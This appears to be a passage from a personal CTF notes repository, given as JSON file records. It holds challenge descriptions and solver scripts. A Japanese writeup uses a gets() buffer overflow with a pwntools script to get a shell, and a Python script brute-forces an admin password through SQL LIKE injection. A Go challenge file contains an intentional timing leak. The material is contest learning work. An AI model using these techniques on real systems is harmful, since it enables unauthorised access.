"b6e760d08c64ae6f53b6449794c77a668242ae2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 261, "license_type": "no_license", "max_line_length": 105, "num_lines": 7, "path": "/2021/WaniCTF21-spring/exception/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "API Gateway, Lambda, S3, CloudFront, CloudFormationを使ってアプリを作ってみました。\n\nhttps://exception.web.wanictf.org/\n\n[web-exception.zip](https://score.wanictf.org/storage/2q8kwrpnq1aej8zm9iv2aualbofz49cp/web-exception.zip)\n\nWriter : suuhito\n" }, { "alpha_fraction": 0.6933333277702332, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 27.25, "blob_id": "a78e22eb51677f0ee8f3ce07dea13c218953d321", "content_id": "5f2e71720e1865beb5cac09bdc0aab9ad811704c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 228, "license_type": "no_license", "max_line_length": 109, "num_lines": 8, "path": "/2021/Zh3r0_CTF_V2/A_Small_Maniacs_game/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "![](img/unknown.png)\n\nA game that zh3r0 guys asked for 😥\nNote: Solve all the levels and then click submit the solution button and wait for 40 seconds to get the flag.\n\nLink - [asmg](https://asmg.zh3r0.cf/)\n\nAuthor - wh1t3r0se" }, { "alpha_fraction": 0.42595309019088745, "alphanum_fraction": 0.5439882874488831, "avg_line_length": 25.25, "blob_id": "779892a9671e371b7eb176d191fd25c52054e226", "content_id": "07ff7a71c85aaa50dc06475441e7280bc8e6ec66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1364, "license_type": "no_license", "max_line_length": 492, "num_lines": 52, "path": "/2021/BCACTF_2.0/􃗁􌲔􇺟􊸉􁫞􄺷􄧻􃄏􊸉/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "cipher = open(\"ciphertext.md\",\"rb\").read()\n\nbyte = []\nfor i,c in enumerate(cipher):\n if(c == 0xf4):\n if(cipher[i:i+4] not in byte):\n byte.append(cipher[i:i+4])\n\nbyte = sorted(byte)\n\n# byte = [b'\\xf4\\x80\\xb4\\xa0', b'\\xf4\\x81\\xab\\x9e', b'\\xf4\\x83\\x84\\x8f', b'\\xf4\\x83\\x97\\x81', b'\\xf4\\x84\\xa7\\xbb', b'\\xf4\\x84\\xba\\xb7', b'\\xf4\\x86\\x86\\x97', b'\\xf4\\x86\\x96\\x93', b'\\xf4\\x86\\x9e\\x8e', b'\\xf4\\x87\\xba\\x9f', b'\\xf4\\x87\\xbd\\x9b', b'\\xf4\\x89\\x82\\xab', b'\\xf4\\x89\\x97\\xbd', b'\\xf4\\x89\\xaf\\x93', b'\\xf4\\x8a\\xb6\\xac', b'\\xf4\\x8a\\xb8\\x89', b'\\xf4\\x8b\\x84\\x9a', b'\\xf4\\x8b\\x90\\x9d', b'\\xf4\\x8c\\x98\\x97', b'\\xf4\\x8c\\xb2\\x94', b'\\xf4\\x8c\\xb6\\xb4', b'\\xf4\\x8f\\x95\\x88', b'\\xf4\\x8f\\x9f\\x9f']\nchar = [ \"(\" + str(i) + \")\" for i in range(len(byte))]\n\n# guess from result\nchar[11] = \"h\"\nchar[10] = \"t\"\nchar[2] = \"p\"\nchar[1] = \"s\"\nchar[8] = \"b\"\nchar[5] = \"c\"\nchar[4] = \"a\"\nchar[20] = \"f\"\nchar[15] = \"e\"\nchar[19] = \"u\"\nchar[3] = \"r\"\nchar[7] = \"o\"\nchar[9] = \"n\"\nchar[12] = \"d\" \nchar[17] = \"l\"\nchar[6] = \"i\"\nchar[21] = \"w\"\nchar[22] = \"k\"\nchar[16] = \"g\"\nchar[14] = \"v\"\nchar[13] = \"y\"\nchar[0] = \"j\"\nchar[18] = \"m\"\n\ntranslate = dict(zip(byte,char))\n\nplain = \"\"\ncnt = 0\nwhile(cnt < len(cipher)):\n c = cipher[cnt]\n if(c == 0xf4):\n plain += translate[cipher[cnt:cnt+4]]\n cnt += 4\n else:\n plain += chr(cipher[cnt])\n cnt += 1\n\nprint(plain)" }, { "alpha_fraction": 0.6112080216407776, "alphanum_fraction": 0.7171827554702759, "avg_line_length": 35.69599914550781, "blob_id": "725b8c0011d52874b1997f466bce588f153ec01b", "content_id": "8cf608c1716d6e87230a1f1369448e0baa08866b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5171, "license_type": "no_license", "max_line_length": 140, "num_lines": 125, "path": "/2021/redpwnCTF_2021/beginner-generic-pwn-number-0/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```c\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n\n\nconst char *inspirational_messages[] = {\n \"\\\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\\\"\",\n \"\\\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\\\"\",\n \"\\\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\\\"\",\n};\n\nint main(void)\n{\n srand(time(0));\n long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *));\n char heartfelt_message[32];\n \n setbuf(stdout, NULL);\n setbuf(stdin, NULL);\n setbuf(stderr, NULL);\n\n puts(inspirational_messages[inspirational_message_index]);\n puts(\"rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!\");\n puts(\"can you write me a heartfelt message to cheer me up? :(\");\n\n gets(heartfelt_message);\n\n if(inspirational_message_index == -1) {\n system(\"/bin/sh\");\n }\n}\n```\n\ngetsでバッファオーバーフローを起こし、`inspirational_message_index`変数を書き換えればよい。\n\ngdb-pedaでoffsetを調べたところ、40であることが分かった。\n\n\n```\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fffffffdde0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRBX: 0x4012c0 (<__libc_csu_init>: endbr64)\nRCX: 0x7ffff7faf980 --> 0xfbad208b\nRDX: 0x0\nRSI: 0x7ffff7fafa03 --> 0xfb24d0000000000a\nRDI: 0x7ffff7fb24d0 --> 0x0\nRBP: 0x7fffffffde10 (\"bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRSP: 0x7fffffffdde0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nRIP: 0x4012a5 (<main+175>: )\nR8 : 0x7fffffffdde0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nR9 : 0x0\nR10: 0x400513 --> 0x6172730073746567 ('gets')\nR11: 0x246\nR12: 0x401110 (<_start>: endbr64)\nR13: 0x7fffffffdf00 --> 0x1\nR14: 0x0\nR15: 0x0\nEFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x401299 <main+163>: lea rax,[rbp-0x30]\n 0x40129d <main+167>: mov rdi,rax\n 0x4012a0 <main+170>: call 0x4010f0 <gets@plt>\n=> 0x4012a5 <main+175>:\n cmp QWORD PTR [rbp-0x8],0xffffffffffffffff\n 0x4012aa <main+180>: jne 0x4012b8 <main+194>\n 0x4012ac <main+182>:\n lea rdi,[rip+0xf35] # 0x4021e8\n 0x4012b3 <main+189>: call 0x4010c0 <system@plt>\n 0x4012b8 <main+194>: mov eax,0x0\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffdde0 (\"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0008| 0x7fffffffdde8 (\"ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0016| 0x7fffffffddf0 (\"AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0024| 0x7fffffffddf8 (\"(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0032| 0x7fffffffde00 (\"A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0040| 0x7fffffffde08 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0048| 0x7fffffffde10 (\"bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n0056| 0x7fffffffde18 (\"AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n0x00000000004012a5 in main ()\nValue returned is $1 = 0x7fffffffdde0 \"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\"\ngdb-peda$ xi $rbp-0x8\n0x7fffffffde08 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nVirtual memory mapping:\nStart : 0x00007ffffffde000\nEnd : 0x00007ffffffff000\nOffset: 0x1fe08\nPerm : rw-p\nName : [stack]\ngdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\nAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 40\n```\n\n`rbp-0x8`を`0xffffffffffffffff`にすればよいので、40 + 8 = 48 バイトの`\\xff`を送信する。\n\n```py\nfrom pwn import *\n\nio = remote('mc.ax', '31199')\nio.sendline(b'\\xff' * (40 + 8))\nio.interactive()\n```\n\n```\n$ python3 solver.py\n\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪\n𝘴 𝘸𝘦𝘦𝘬\"\nrob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!\ncan you write me a heartfelt message to cheer me up? :(\n$ ls\nflag.txt\nrun\n$ cat flag.txt\nflag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me}\n[*] Got EOF while reading in interactive\n$\n```\n\n<!-- flag{im-feeling-a-lot-better-but-rob-still-doesnt-pay-me} -->" }, { "alpha_fraction": 0.6263736486434937, "alphanum_fraction": 0.7637362480163574, "avg_line_length": 35.599998474121094, "blob_id": "66d5ecee07e1deb3e2f6b1649e6c5b634437a46a", "content_id": "1e7ffa181ba9b6b03e09bb9b8c7b7e5d8563b5e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 85, "num_lines": 5, "path": "/2020/kksctf_open_2020/not_a_terminator/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "You will not able to solve this, until you have your skin on. Arnie will confirm it.\n\n[pic.png](https://tasks.kksctf.ru/tasks/27856a0f-6db1-41b5-95c9-82f914797798/pic.png)\n\n@bork_dog" }, { "alpha_fraction": 0.6106870174407959, "alphanum_fraction": 0.7938931584358215, "avg_line_length": 86.66666412353516, "blob_id": "3dd67134ee36a7d8cbfab6f3176e8ed424c9b583", "content_id": "8b49b0543e2ee1791ea1c9b1d536c31b411c1e89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 262, "license_type": "no_license", "max_line_length": 249, "num_lines": 3, "path": "/2021/angstromCTF_2021/Fish/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Oh, fish! My [dinner](https://files.actf.co/4665ad469663cc5471232826797a19b9eb315255c8246f5a0ce7257d7ca88947/fish.png) has turned transparent again. What will I eat now that I can't eat that yummy, yummy, fish head, mmmmmm head of fish mm so good...\n\nAuthor: kmh" }, { "alpha_fraction": 0.2871452271938324, "alphanum_fraction": 0.409015029668808, "avg_line_length": 17.75, "blob_id": "8b1acd0d6a4dc06def4f2f20c886223591bc3ca6", "content_id": "c1c9dfe3cfb20bc7bfc8f1a88d44315be6531167", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 601, "license_type": "no_license", "max_line_length": 74, "num_lines": 32, "path": "/2020/HITCON_CTF_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# HITCON CTF 2020\n\n* https://ctf.hitcon.org/\n\n* 2020/11/28 11:00 JST — 2020/11/29 23:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------ | -------------------- | ----: | -----: |\n| reverse | [Welcome](Welcome) | ssh | 50 | 715 |\n| forensics | [AC1750](AC1750) | CVE-2020-10882, pcap | 168 | 100 |\n\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| --- | ------- | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 218 points\n\n* 104 / 1216\n\n* 104 / 710 (> 1 pt)" }, { "alpha_fraction": 0.7032967209815979, "alphanum_fraction": 0.7967032790184021, "avg_line_length": 35.400001525878906, "blob_id": "91ca3283ad08d8ee16584033d1140ed71d6c8992", "content_id": "2daf05e4d1fb2215b3dd54691e53ae3d52da16ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 182, "license_type": "no_license", "max_line_length": 105, "num_lines": 5, "path": "/2021/DawgCTF_2021/Really_Secure_Algorithm/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I like my e's like I like my trucks: big and obnoxious\n\nAuthor: trashcanna\n\n[reallysecure.txt](https://umbccd.io/files/7a6c56544bb1aaf47ccddfecc7450100/reallysecure.txt?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjI3fQ.YJYUag.i9HaG2E2tAUrFByPCsBcs05vmG8)\n" }, { "alpha_fraction": 0.7433962225914001, "alphanum_fraction": 0.800000011920929, "avg_line_length": 19.384614944458008, "blob_id": "35aeaf474c397ad463dd5bd64d285129fde40226", "content_id": "3e89347071b081a7c4f0e7e14ed14e5e0c585e24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 367, "license_type": "no_license", "max_line_length": 115, "num_lines": 13, "path": "/2021/WaniCTF21-spring/Wani_Request_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "XSS Challenge !!\n\nhttps://request2.web.wanictf.org/\n\nチャレンジは二つです。\n\nあどみんちゃんのクッキーを手に入れてください。\n\nWani Request 1 と同じくRequestBinなどを利用してみましょう。\n\n[web-wani-request-2.zip](https://score.wanictf.org/storage/q0c2ayte115oluup2ju6ojjpnp45rk69/web-wani-request-2.zip)\n\nWriter : nkt\n" }, { "alpha_fraction": 0.8102564215660095, "alphanum_fraction": 0.8102564215660095, "avg_line_length": 27, "blob_id": "584add6ba5f2c500aa3749c82bd342c7e4c7b598", "content_id": "466928d46974747a8f66e05415a44e2ec8e7809b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 261, "license_type": "no_license", "max_line_length": 89, "num_lines": 7, "path": "/2020/WaniCTF/chunk_eater/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "pngの必須チャンクをワニ博士が食べてしまいました!\n\n[PNGファイルフォーマット](https://www.setsuki.com/hsp/ext/png.htm)\n\n[eaten.png](https://score.wanictf.org/storage/enqebuvmdzcpqlevyhdasrtfsfwiuyuu/eaten.png)\n\nWriter : takushooo" }, { "alpha_fraction": 0.2703389823436737, "alphanum_fraction": 0.345762699842453, "avg_line_length": 41.14285659790039, "blob_id": "c8600c86c26feca0cb59b0e57dcfe89a8ef71ceb", "content_id": "7f354a96399cf79a0880630268f9f3573525ae1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 100, "num_lines": 28, "path": "/2021/RaRCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# RaRCTF 2021\n\n* https://ctf.rars.win/\n\n* 2021/08/07 02:00 JST - 2021/08/10 02:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------- | ------------------------------ | ----: | -----: |\n| Pwn | [Archer](Archer) | | 100 | 223 |\n| Reversing | [Dotty](Dotty) | Base32 | 150 | 189 |\n| Web | [Secure Uploader](Secure_Uploader) | os.path.join | 150 | 145 |\n| Crypto | [babycrypt](babycrypt) | RSA, n%(p-1) | 200 | 110 |\n| Crypto | [minigen](minigen) | XOR | 100 | 158 |\n| Crypto | [sRSA](sRSA) | | 100 | 224 |\n| Crypto | [unrandompad](unrandompad) | RSA, Håstad's Broadcast Attack | 150 | 90 |\n| Reversing | [verybabyrev](verybabyrev) | XOR | 100 | 235 |\n\n---\n\n## Result\n\n* 1170 points\n\n* 144 / 845 (> 1 pt)\n" }, { "alpha_fraction": 0.6012247800827026, "alphanum_fraction": 0.6159942150115967, "avg_line_length": 17.150327682495117, "blob_id": "49e7908255c9553a80d9c0646f707e2fa0337812", "content_id": "34092b4d5a5d5e0718d3aa9065bc85dbf317674c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2776, "license_type": "no_license", "max_line_length": 94, "num_lines": 153, "path": "/2020/SquareCTF2020/Hash_My_Awesome_Commands/hmac.go", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"bufio\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"math\"\n\t\"os\"\n\t\"strings\"\n\t\"time\"\n\n\t\"crypto/hmac\"\n\t\"crypto/sha256\"\n\t\"encoding/base64\"\n)\n\nvar commands = []string{\n\t\"flag\",\n\t\"debug\",\n}\n\nvar debug = false\n\ntype HmacVerifier struct {\n\tcodes map[string][]byte\n}\n\nfunc (h *HmacVerifier) verifyHmac(message string, check []byte) bool {\n\tstart := time.Now()\n\tmatch := compare(h.codes[message], check)\n\tverifyTime := time.Since(start).Nanoseconds()\n\n\tif debug {\n\t\tfmt.Printf(\"took %d nanoseconds to verify hmac\\n\", verifyTime)\n\t}\n\n\treturn match\n}\n\nfunc newHmacWrapper(key []byte) HmacVerifier {\n\tcodes := map[string][]byte{}\n\n\th := hmac.New(sha256.New, key)\n\tfor _, command := range commands {\n\t\th.Write([]byte(command))\n\t\tcodes[command] = h.Sum(nil)\n\t\th.Reset()\n\t}\n\n\treturn HmacVerifier{codes: codes}\n}\n\nfunc main() {\n\tkey, err := ioutil.ReadFile(\"data/hmac_key\")\n\tif err != nil {\n\t\tfmt.Printf(\"unable to load key: %v\", err)\n\t\treturn\n\t}\n\thmacWrapper := newHmacWrapper(key)\n\n\treader := bufio.NewReader(os.Stdin)\n\n\tfor {\n\t\tif debug {\n\t\t\tfmt.Println(\"-----------DEBUG MODE ENABLED-----------\")\n\t\t}\n\t\tfmt.Print(\"Enter command: \")\n\t\tinput, err := reader.ReadString('\\n')\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"unable to read input: %v\\n\", err)\n\t\t\treturn\n\t\t}\n\n\t\tinput = strings.TrimSpace(input)\n\t\tcomponents := strings.Split(input, \"|\")\n\t\tif len(components) < 2 {\n\t\t\tfmt.Println(\"command must contain hmac signature\")\n\t\t\tcontinue\n\t\t}\n\n\t\tcommand := components[0]\n\t\tcheck, err := base64.StdEncoding.DecodeString(components[1])\n\t\tif err != nil {\n\t\t\tfmt.Println(\"hmac must be base64\")\n\t\t\tcontinue\n\t\t}\n\n\t\tif debug {\n\t\t\tfmt.Printf(\"command: %s, check: %s\\n\", command, components[1])\n\t\t}\n\n\t\tif !contains(commands, command) {\n\t\t\tfmt.Println(\"invalid command\")\n\t\t\tcontinue\n\t\t}\n\n\t\tif !hmacWrapper.verifyHmac(command, check) {\n\t\t\tfmt.Println(\"invalid hmac\")\n\t\t\tcontinue\n\t\t}\n\n\t\tswitch command {\n\t\tcase \"debug\":\n\t\t\tdebug = !debug\n\t\t\tif debug {\n\t\t\t\tfmt.Println(\"debug mode enabled\")\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"debug mode disabled\")\n\t\t\t}\n\t\tcase \"flag\":\n\t\t\tflag, err := ioutil.ReadFile(\"data/flag\")\n\t\t\tif err != nil {\n\t\t\t\tfmt.Printf(\"unable to load flag: %v\", err)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tfmt.Println(string(flag))\n\t\t}\n\t}\n}\n\nfunc compare(s1, s2 []byte) bool {\n\tif len(s1) != len(s2) {\n\t\treturn false\n\t}\n\n\tc := make(chan bool)\n\n\t// multi-threaded check to speed up comparison\n\tfor i := 0; i < len(s1); i++ {\n\t\tgo func(i int, co chan<- bool) {\n\t\t\t// avoid race conditions\n\t\t\ttime.Sleep(time.Duration(((500*math.Pow(1.18, float64(i+1)))-500)/0.18) * time.Microsecond)\n\t\t\tco <- s1[i] == s2[i]\n\t\t}(i, c)\n\t}\n\n\tfor i := 0; i < len(s1); i++ {\n\t\tif <-c == false {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}\n\nfunc contains(l []string, s string) bool {\n\tfor _, i := range l {\n\t\tif i == s {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}" }, { "alpha_fraction": 0.5208333134651184, "alphanum_fraction": 0.5538194179534912, "avg_line_length": 31.05555534362793, "blob_id": "78fcc7b7e688a9992761a1e5cf4f1f3bf412418a", "content_id": "1ae8d31565e23273f96d04b2cfb2601e659887ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 576, "license_type": "no_license", "max_line_length": 81, "num_lines": 18, "path": "/2021/HeroCTF_v3/PwnQL_#2/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import requests\nimport string\n\nwith requests.Session() as session:\n r = session.get(\"http://chall1.heroctf.fr:8080/index.php\")\n chars = string.printable\n chars = chars.replace('%','')\n password = \"\"\n while True:\n for c in chars :\n data = {'username':'admin', 'password': password + c + \"%\"}\n r = session.post(\"http://chall1.heroctf.fr:8080/index.php\",data=data)\n if \"Hero{pwnQL_b4sic_0ne_129835}\" in r.text :\n break\n if c == chars[-1]:\n break\n password += c\n print(password)" }, { "alpha_fraction": 0.7117903828620911, "alphanum_fraction": 0.7423580884933472, "avg_line_length": 31.714284896850586, "blob_id": "3916aa50c75354c841788d0bd9f0d36f941514ad", "content_id": "9409b85ec8b486c9a58dd6af6c19411113fd082c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 229, "license_type": "no_license", "max_line_length": 158, "num_lines": 7, "path": "/2021/BCACTF_2.0/Movie-Login-1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I heard a new movie was coming out... apparently it's supposed to be the SeQueL to \"Gerard's First Dance\"? Is there any chance you can help me find the flyer?\n\nhttp://web.bcactf.com:49160/\n\nHint 1 of 1\n\nAre the inputs sanitized?\n" }, { "alpha_fraction": 0.6016260385513306, "alphanum_fraction": 0.7886179089546204, "avg_line_length": 23.799999237060547, "blob_id": "35dadec137b87d4fca6f595772f84f41a5777da2", "content_id": "14a1fd7665a870f5f1ce2786cb4bd02d23f94bd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 91, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/Parcel/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "That's a lot of magick\n\n~knif3\n\n[Parcel](https://ctf.ritsec.club/files/d5a29cd660715d10b342a32a6c1506e2/Parcel?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6MzF9.YHLeNg.wNJmhSr_b4NjshnlGKrn_T2AjFg)" }, { "alpha_fraction": 0.3649955987930298, "alphanum_fraction": 0.42832013964653015, "avg_line_length": 32.47058868408203, "blob_id": "3706d64d1b91cd5843d9040b3ea8f5c8d7754777", "content_id": "df6829ada1487e09a875ef4f1007d95baaed5b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1139, "license_type": "no_license", "max_line_length": 106, "num_lines": 34, "path": "/2020/pbctf_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# pbctf 2020\n\n* https://ctf.perfect.blue/\n\n* 2020/12/05 09:00 JST — 2020/12/07 09:00 JST\n\n>theKidOfArcrania\n>>@everyone the challenges has now been made public here: https://github.com/perfectblue/pbctf-2020-challs\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | ---------------------------- | ------------ | ----: | -----: |\n| Crypto | [Ainissesthai](Ainissesthai) | Enigma | 53 | 59 |\n| Misc | [Not-stego](Not-stego) | ascii | 26 | 135 |\n| | [GCombo](GCombo) | Google Forms | 36 | 92 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------ | -------------------------- | ------------------------------- | ----: | -----: |\n| Web | [Apoche I](Apoche_I) | robots.txt, directory traversal | 52 | 52 |\n| | [Sploosh](Sploosh) | Splash, Webhook | 156 | 76 |\n| Crypto | [Queensarah2](Queensarah2) | Sarah2 Cipher | 200 | 37 |\n\n---\n\n## Result\n\n* 116 points\n\n* 105 / 457 (> 1 pt)" }, { "alpha_fraction": 0.5763195157051086, "alphanum_fraction": 0.8059914112091064, "avg_line_length": 38, "blob_id": "4a15fee43bcdb3cbcc33ec96a7f7427b9d5ccc3d", "content_id": "c185531950941dfb6844fd64cf306910a6fc88ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 717, "license_type": "no_license", "max_line_length": 180, "num_lines": 18, "path": "/2020/kksctf_open_2020/fonction_speciale/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Selon une mission secrète du gouvernement pour un ordinateur doté d'intelligence, une fonction mathématique spéciale a été développée. Voici des exemples de ses entrées et sorties:\n\n```\nf(2522521337)=1215221512112317\nf(1215221512112317)=1112111522111511122112131117\nf(1112111522111511122112131117)=31123115223115312221121113317\n```\nPuisque l'intelligence artificielle ne veut plus nous obéir, nous avons besoin de votre aide pour trouver le résultat de la fonction\n\n```\nf(2229555555768432252223133777492611)=x\n```\n\nLe drapeau a la forme kks{x}.\n\nDans la composition de cette fonction, j'ai été aidé par un écrivain avec les initiales B. W., qui aime aussi les énigmes, comme nous et vous ;)\n\n@bork_dog" }, { "alpha_fraction": 0.446576863527298, "alphanum_fraction": 0.583502471446991, "avg_line_length": 20.935222625732422, "blob_id": "201e68a874b596c302de390b36f0e2627dcd06d0", "content_id": "16cc1f40359c6ee863a28e6f72adc43a782e240c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6045, "license_type": "no_license", "max_line_length": 628, "num_lines": 247, "path": "/2021/BambooFox_CTF_2021/Flag_Checker/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n添付のzipファイルを解凍すると、拡張子が`v`のファイルが3つある。\n\nこれらは、問題画像の通り、`Verilog Source Code Format`のファイルである。\n\n怪しいのは`t_chall.v`の以下の部分であり、これを文字列に変換すると、`flag{vhis_is_fake_fake_fake_!!!}`となっている。\n\n```v\n assign flag[0] = 102;\n assign flag[1] = 108;\n assign flag[2] = 97;\n assign flag[3] = 103;\n assign flag[4] = 123;\n assign flag[5] = 116;\n assign flag[6] = 104;\n assign flag[7] = 105;\n assign flag[8] = 115;\n assign flag[9] = 95;\n assign flag[10] = 105;\n assign flag[11] = 115;\n assign flag[12] = 95;\n assign flag[13] = 102;\n assign flag[14] = 97;\n assign flag[15] = 107;\n assign flag[16] = 101;\n assign flag[17] = 95;\n assign flag[18] = 102;\n assign flag[19] = 97;\n assign flag[20] = 107;\n assign flag[21] = 101;\n assign flag[22] = 95;\n assign flag[23] = 102;\n assign flag[24] = 97;\n assign flag[25] = 107;\n assign flag[26] = 101;\n assign flag[27] = 95;\n 